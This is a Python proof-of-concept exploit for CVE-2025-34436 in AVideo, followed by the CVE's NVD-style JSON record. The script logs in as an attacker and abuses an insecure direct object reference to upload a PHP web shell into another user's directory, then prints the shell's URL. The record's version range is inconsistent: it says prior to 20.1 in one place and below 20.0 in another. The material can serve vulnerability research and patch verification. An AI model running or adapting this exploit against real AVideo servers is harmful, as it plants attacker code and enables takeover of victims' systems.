CVE-2025-34436

import requests import sys # CVE-2025-34436 PoC - IDOR Arbitrary File Upload in AVideo # Target: AVideo < 20.1 def exploit_avideo(target_url, username, password, target_user_id, malicious_file_path): """ Exploit IDOR vulnerability to upload file to another user's directory Args: target_url: Base URL of AVideo installation username: Attacker account username password: Attacker account password target_user_id: Victim's user ID (directory owner) malicious_file_path: Path to file to upload """ session = requests.Session() # Step 1: Login to get authenticated session login_url = f"{target_url}/login.json" login_data = { 'user': username, 'pass': password } try: login_response = session.post(login_url, data=login_data, timeout=10) if login_response.status_code != 200: print("[-] Login failed - Invalid credentials") return False print("[+] Successfully authenticated") # Step 2: Read malicious file content with open(malicious_file_path, 'rb') as f: file_content = f.read() # Step 3: Upload file to target user's directory (IDOR) upload_url = f"{target_url}/upload" # Key: Modify 'user_id' parameter to point to victim files = { 'file': ('shell.php', file_content, 'application/x-php') } data = { 'user_id': target_user_id, # IDOR: Point to victim's directory 'type': 'video' } upload_response = session.post(upload_url, files=files, data=data, timeout=30) if upload_response.status_code == 200: print(f"[+] File uploaded to user_id {target_user_id}'s directory") print(f"[+] Access file at: {target_url}/videos/user_{target_user_id}/shell.php") return True else: print("[-] Upload failed") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 6: print("Usage: python cve-2025-34436.py <target_url> <username> <password> <target_user_id> <file_path>") print("Example: python cve-2025-34436.py http://target.com attacker pass123 5 shell.php") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] target_uid = sys.argv[4] file_path = sys.argv[5] exploit_avideo(target, user, pwd, target_uid, file_path)

{"cve": {"id": "CVE-2025-34436", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.017", "lastModified": "2025-12-19T19:15:51.073", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 allow any authenticated user to upload files into directories belonging to other users due to an insecure direct object reference. The upload functionality verifies authentication but does not enforce ownership checks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/c279999cbd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}